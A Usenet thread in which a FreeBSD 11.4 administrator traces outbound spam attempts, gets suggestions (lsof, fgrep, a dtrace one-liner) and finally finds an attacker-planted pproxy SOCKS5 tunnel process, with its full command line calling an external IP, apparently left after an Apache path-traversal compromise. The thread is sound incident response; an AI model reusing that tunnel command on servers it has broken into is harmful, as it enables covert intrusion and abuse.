• locating malware

    From Mike Scott@21:1/5 to All on Thu Feb 10 16:39:59 2022
    Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    has been sending, and fortunately failing, to send junk mail to an MS
    machine, possibly a hotmail destination (certainly MS network). It's
    firewalled in now, but it was sending

    EHLO localhost
    MAIL FROM:<info@newretail.live>

    and then closing the connection.

    A full clamav scan is currently running but will take quite a few hours.


    So, given an unknown program that is occasionally trying to make an
    outbound link, can anyone suggest please how to find it?


    Thanks.


    --
    Mike Scott
    Harlow, England

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From John D Groenveld@21:1/5 to usenet.16@scottsonline.org.uk.inval on Thu Feb 10 19:58:03 2022
    In article <su3f50$tts$1@dont-email.me>,
    Mike Scott <usenet.16@scottsonline.org.uk.invalid> wrote:
    So, given an unknown program that is occasionally trying to make an
    outbound link, can anyone suggest please how to find it?

    Assuming you trust the host, Bad Idea[tm], you can run lsof on it: <URL:https://people.freebsd.org/~abe/> <URL:https://www.freshports.org/sysutils/lsof/>

    John
    groenveld@acm.org

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Matthias Meyser@21:1/5 to All on Thu Feb 10 22:14:28 2022
    Am 10.02.2022 um 17:39 schrieb Mike Scott:
    Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    has been sending, and fortunately failing, to send junk mail to an MS machine, possibly a hotmail destination (certainly MS network). It's firewalled in now, but it was sending

    EHLO localhost
    MAIL FROM:<info@newretail.live>

    fgrep -Ri newretail.live /



    --
    Diese E-Mail wurde von Avast Antivirus-Software auf Viren geprüft. https://www.avast.com/antivirus

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Gerhard Strangar@21:1/5 to Mike Scott on Fri Feb 11 06:39:12 2022
    Mike Scott wrote:

    So, given an unknown program that is occasionally trying to make an
    outbound link, can anyone suggest please how to find it?

    Not sure if this works on 11.4:
    kldload dtraceall
    dtrace -n 'syscall:freebsd:connect:entry {trace(execname)}'

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Mike Scott@21:1/5 to Matthias Meyser on Wed Feb 16 14:57:38 2022
    On 10/02/2022 21:14, Matthias Meyser wrote:
    Am 10.02.2022 um 17:39 schrieb Mike Scott:
    Hi all. Bit of a problem ATM, as /something/ on my machine (fbsd 11.4)
    has been sending, and fortunately failing, to send junk mail to an MS
    machine, possibly a hotmail destination (certainly MS network). It's
    firewalled in now, but it was sending

    EHLO localhost
    MAIL FROM:<info@newretail.live>

    fgrep -Ri newretail.live  /



    Thanks to all for the comments.

    Unfortunately (perhaps?) there haven't been any outbound attempts
    lately, which makes me very uncomfortable. I'm running this one: brute
    force, and assumes there's no encryption involved.

    But hopefully I'll soon have the system ported to a new and smaller box,
    this time using jails for outward-facing services. (An enterprise that's
    proven much harder than anticipated!)

    --
    Mike Scott
    Harlow, England

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Mike Scott@21:1/5 to All on Thu Feb 17 14:54:56 2022
    On 16/02/2022 14:57, Mike Scott wrote:
    ....



    After an absence of a few days, similar behaviour is back. Same
    destination IP, but zero-length packets with bad checksum:

    root@data:/var/tmp # script z tcpdump -nvvv -i pflog0 port 25 and src 192.168.0.1
    Script started, output file is z
    tcpdump: listening on pflog0, link-type PFLOG (OpenBSD pflog file),
    capture size 262144 bytes

    13:49:15.894711 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto
    TCP (6), length 60)
    192.168.0.1.16375 > 104.47.70.33.25: Flags [S], cksum 0x6f28
    (incorrect -> 0x69dc), seq 2905393045, win 65535, options [mss
    1460,nop,wscale 6,sackOK,TS val 799509169 ecr 0], length 0


    However, after shutting down the webserver, I found a couple of
    processes still running as www, one of which was

    ./python -m pproxy -l socks5+in://116.203.212.184:10246/@192.168.0.1,#pproxy:CKjBrJD3 (python3.6)


    and which seemed top be in a loop checking the remote end, static.184.212.203.116.clients.your-server.de.


    It looks as though the recent apache path bug opened up my server, and
    this was left around. Looks like a proxy mechanism, that's about to be
    kill -9'ed.

    Thanks all.


    Oh, BTW, it's unfortunate that 11.4 froze with the package repository
    stuck on the buggy version (path backtrack) of apache. I'd have hoped
    someone would put in just the one bug-fix update.



    --
    Mike Scott
    Harlow, England

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)